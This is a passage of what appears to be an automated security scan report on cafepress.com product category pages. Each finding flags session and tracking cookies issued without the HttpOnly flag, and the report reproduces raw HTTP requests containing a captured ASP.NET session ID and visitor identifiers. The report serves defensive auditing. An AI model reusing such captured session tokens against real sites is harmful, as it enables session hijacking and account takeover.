Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.25. http://www.cafepress.com/+magnets previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+magnets

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.26. http://www.cafepress.com/+mousepads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+mousepads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.27. http://www.cafepress.com/+mugs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+mugs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.28. http://www.cafepress.com/+ornaments previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+ornaments

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.29. http://www.cafepress.com/+posters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+posters

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.30. http://www.cafepress.com/+stadium-blanket previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+stadium-blanket

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.31. http://www.cafepress.com/+steins previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+steins

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.32. http://www.cafepress.com/+stocking previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+stocking

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
